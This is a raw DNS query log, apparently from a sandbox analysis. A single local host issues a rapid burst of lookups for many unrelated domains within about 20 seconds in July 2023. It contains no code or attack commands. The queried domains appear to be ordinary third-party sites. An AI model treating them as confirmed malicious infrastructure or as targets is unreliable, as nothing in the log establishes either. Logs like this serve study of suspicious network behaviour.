                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.769831896 CEST192.168.2.48.8.8.80xdad3Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.770314932 CEST192.168.2.48.8.8.80xa873Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.771207094 CEST192.168.2.48.8.8.80x3b9fStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.774332047 CEST192.168.2.48.8.8.80xacf8Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.775662899 CEST192.168.2.48.8.8.80xa656Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.777883053 CEST192.168.2.48.8.8.80x670dStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.779223919 CEST192.168.2.48.8.8.80xae76Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.830871105 CEST192.168.2.48.8.8.80xd7d4Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.870325089 CEST192.168.2.48.8.8.80x1c6dStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.886430025 CEST192.168.2.48.8.8.80x6723Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:47.997237921 CEST192.168.2.48.8.8.80xca35Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.070913076 CEST192.168.2.48.8.8.80xe2eStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.108133078 CEST192.168.2.48.8.8.80xa61Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.108445883 CEST192.168.2.48.8.8.80xe204Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.170308113 CEST192.168.2.48.8.8.80xde82Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.359137058 CEST192.168.2.48.8.8.80xd455Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.504844904 CEST192.168.2.48.8.8.80x63a2Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.540587902 CEST192.168.2.48.8.8.80x19cdStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.605122089 CEST192.168.2.48.8.8.80xf78bStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.626616001 CEST192.168.2.48.8.8.80x6acfStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.627573013 CEST192.168.2.48.8.8.80x9d63Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.784554005 CEST192.168.2.48.8.8.80x4b0bStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:48.914601088 CEST192.168.2.48.8.8.80xa873Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.058348894 CEST192.168.2.48.8.8.80xdf40Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.095685005 CEST192.168.2.48.8.8.80xeac9Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.132322073 CEST192.168.2.48.8.8.80x77b5Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.214905024 CEST192.168.2.48.8.8.80xe668Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.214905024 CEST192.168.2.48.8.8.80xbe62Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.216519117 CEST192.168.2.48.8.8.80x335bStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.223365068 CEST192.168.2.48.8.8.80xbd3Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.287589073 CEST192.168.2.48.8.8.80xf805Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.321264982 CEST192.168.2.48.8.8.80x4a98Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.621135950 CEST192.168.2.4128.8.10.900xcbStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.750957966 CEST192.168.2.48.8.8.80x9317Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.752973080 CEST192.168.2.48.8.8.80x98ceStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:49.766778946 CEST192.168.2.48.8.8.80x1c1cStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.224828959 CEST192.168.2.48.8.8.80x4fb7Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.237857103 CEST192.168.2.48.8.8.80x4594Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.363322973 CEST192.168.2.48.8.8.80xc1aaStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.405992985 CEST192.168.2.48.8.8.80x78e6Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.407552004 CEST192.168.2.48.8.8.80xf4c9Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.506540060 CEST192.168.2.48.8.8.80xe3cbStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.624422073 CEST192.168.2.48.8.8.80xe849Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.626034975 CEST192.168.2.48.8.8.80xb246Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.798324108 CEST192.168.2.48.8.8.80x4eecStandard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.830308914 CEST192.168.2.48.8.8.80x7497Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:50.908622026 CEST192.168.2.48.8.8.80xed1dStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.622812033 CEST192.168.2.4128.8.10.900xd2Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.642385960 CEST192.168.2.48.8.8.80x645eStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.711000919 CEST192.168.2.48.8.8.80x7489Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.877804041 CEST192.168.2.48.8.8.80xfe9cStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:51.891535044 CEST192.168.2.48.8.8.80x8ddStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.103535891 CEST192.168.2.4198.32.64.120xb1Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.339622021 CEST192.168.2.48.8.8.80x3e18Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.376754999 CEST192.168.2.48.8.8.80xd06fStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.495821953 CEST192.168.2.48.8.8.80x7ee9Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.516963959 CEST192.168.2.48.8.8.80x6798Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.551651955 CEST192.168.2.48.8.8.80x5ed8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:52.905307055 CEST192.168.2.48.8.8.80x8b30Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:53.218576908 CEST192.168.2.48.8.8.80xc4eeStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:54.068030119 CEST192.168.2.48.8.8.80x5ed8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:54.201549053 CEST192.168.2.48.8.8.80x23fdStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:54.849877119 CEST192.168.2.48.8.8.80xd924Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:55.025609016 CEST192.168.2.48.8.8.80x934bStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.035193920 CEST192.168.2.48.8.8.80x5ed8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.163042068 CEST192.168.2.4128.8.10.900xcbStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.236013889 CEST192.168.2.48.8.8.80xb10fStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.385279894 CEST192.168.2.48.8.8.80x4907Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.387404919 CEST192.168.2.48.8.8.80x3216Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.584486008 CEST192.168.2.48.8.8.80x6cbbStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:56.775734901 CEST192.168.2.48.8.8.80x679cStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.185909033 CEST192.168.2.4128.8.10.900xd2Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.191211939 CEST192.168.2.48.8.8.80xafe2Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.482048988 CEST192.168.2.48.8.8.80xb130Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.675342083 CEST192.168.2.4198.32.64.120xb1Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.810674906 CEST192.168.2.48.8.8.80x4907Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.813261032 CEST192.168.2.48.8.8.80xcb89Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:57.857331038 CEST192.168.2.48.8.8.80xd9d7Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.237375975 CEST192.168.2.48.8.8.80xc287Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.311820984 CEST192.168.2.48.8.8.80xb52dStandard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.607028961 CEST192.168.2.48.8.8.80x52b1Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.921595097 CEST192.168.2.48.8.8.80xba1cStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:58.956573963 CEST192.168.2.48.8.8.80x16cStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:59.374959946 CEST192.168.2.48.8.8.80x79c3Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:59.532016993 CEST192.168.2.48.8.8.80x48a1Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.261025906 CEST192.168.2.48.8.8.80x58e5Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.301986933 CEST192.168.2.48.8.8.80x70d7Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.378037930 CEST192.168.2.48.8.8.80xb355Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.426347017 CEST192.168.2.48.8.8.80x91fStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.428407907 CEST192.168.2.48.8.8.80x8fcbStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.531289101 CEST192.168.2.48.8.8.80xf215Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.637065887 CEST192.168.2.48.8.8.80x799aStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.639327049 CEST192.168.2.48.8.8.80xf53cStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.750502110 CEST192.168.2.48.8.8.80x48f3Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.751297951 CEST192.168.2.48.8.8.80xe1afStandard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.751297951 CEST192.168.2.48.8.8.80x736eStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.768304110 CEST192.168.2.48.8.8.80x8379Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.839246988 CEST192.168.2.48.8.8.80x1b36Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.872487068 CEST192.168.2.48.8.8.80x51eeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.919543028 CEST192.168.2.48.8.8.80x8975Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:00.919543028 CEST192.168.2.48.8.8.80x2036Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.082050085 CEST192.168.2.48.8.8.80x6554Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.163813114 CEST192.168.2.48.8.8.80xe980Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.249723911 CEST192.168.2.48.8.8.80xe658Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.274755955 CEST192.168.2.48.8.8.80xe326Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.387942076 CEST192.168.2.48.8.8.80xb6ffStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.390645981 CEST192.168.2.48.8.8.80x85c4Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.436985970 CEST192.168.2.48.8.8.80x26a1Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.484808922 CEST192.168.2.48.8.8.80x122cStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.565418005 CEST192.168.2.48.8.8.80xafc6Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.565418005 CEST192.168.2.48.8.8.80xa930Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.671528101 CEST192.168.2.48.8.8.80x693cStandard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.819402933 CEST192.168.2.4192.5.5.2410x45Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.836306095 CEST192.168.2.4192.58.128.300x57Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.921864033 CEST192.168.2.48.8.8.80x54c2Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:01.984302044 CEST192.168.2.48.8.8.80xfbbaStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.047871113 CEST192.168.2.48.8.8.80xe84bStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.132390976 CEST192.168.2.48.8.8.80xf955Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.313404083 CEST192.168.2.48.8.8.80x51eeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.391263008 CEST192.168.2.48.8.8.80x5e0dStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.598886967 CEST192.168.2.48.8.8.80x50a8Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.786118984 CEST192.168.2.4192.33.4.120xcbStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:02.808234930 CEST192.168.2.4198.32.64.120x4eStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.079518080 CEST192.168.2.48.8.8.80x8388Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.349989891 CEST192.168.2.4192.33.4.120x6bStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.372005939 CEST192.168.2.4192.58.128.300x2dStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.435240030 CEST192.168.2.48.8.8.80xb36dStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.524287939 CEST192.168.2.48.8.8.80x51eeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.863249063 CEST192.168.2.48.8.8.80x91c0Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:03.939090967 CEST192.168.2.48.8.8.80xddf8Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:04.057343960 CEST192.168.2.48.8.8.80x2cd9Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:04.642410040 CEST192.168.2.48.8.8.80xf794Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.172629118 CEST192.168.2.48.8.8.80xddf8Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.172629118 CEST192.168.2.48.8.8.80x8cStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.717968941 CEST192.168.2.48.8.8.80x51eeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.797755957 CEST192.168.2.48.8.8.80xb257Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:05.798281908 CEST192.168.2.48.8.8.80xb13Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.110424042 CEST192.168.2.48.8.8.80x5329Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.192883968 CEST192.168.2.48.8.8.80xb084Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.420768023 CEST192.168.2.48.8.8.80xddf8Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.500050068 CEST192.168.2.48.8.8.80xfb74Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.505136967 CEST192.168.2.48.8.8.80xa071Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:06.612211943 CEST192.168.2.48.8.8.80xda45Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.250056028 CEST192.168.2.48.8.8.80x749Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.375135899 CEST192.168.2.48.8.8.80xc653Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.375288963 CEST192.168.2.48.8.8.80x931eStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.499825001 CEST192.168.2.48.8.8.80xbdceStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.500466108 CEST192.168.2.48.8.8.80xcc13Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.547264099 CEST192.168.2.48.8.8.80xcff2Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.547311068 CEST192.168.2.48.8.8.80x4714Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.547723055 CEST192.168.2.48.8.8.80x3ba2Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.642577887 CEST192.168.2.48.8.8.80xbf51Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.781682968 CEST192.168.2.48.8.8.80x5876Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.828955889 CEST192.168.2.48.8.8.80xa782Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.830216885 CEST192.168.2.48.8.8.80x8c86Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.831688881 CEST192.168.2.48.8.8.80xc8a3Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.893651962 CEST192.168.2.48.8.8.80x15f6Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.894107103 CEST192.168.2.48.8.8.80xdc50Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.894543886 CEST192.168.2.48.8.8.80xdcd3Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.895169973 CEST192.168.2.48.8.8.80x3c8cStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.895579100 CEST192.168.2.48.8.8.80xb701Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.937407017 CEST192.168.2.48.8.8.80x4fffStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:07.937572956 CEST192.168.2.48.8.8.80x8c56Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.078263998 CEST192.168.2.48.8.8.80x43a9Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.296235085 CEST192.168.2.4198.32.64.120x4eStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.322946072 CEST192.168.2.48.8.8.80x967dStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.375858068 CEST192.168.2.48.8.8.80xcd8dStandard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.377177954 CEST192.168.2.48.8.8.80x886eStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.547324896 CEST192.168.2.48.8.8.80x2b8fStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.547404051 CEST192.168.2.48.8.8.80x371Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.547647953 CEST192.168.2.48.8.8.80x1144Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.549144983 CEST192.168.2.48.8.8.80x81ffStandard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.549144983 CEST192.168.2.48.8.8.80xa93bStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.593578100 CEST192.168.2.48.8.8.80x65acStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:08.766113997 CEST192.168.2.48.8.8.80x5355Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
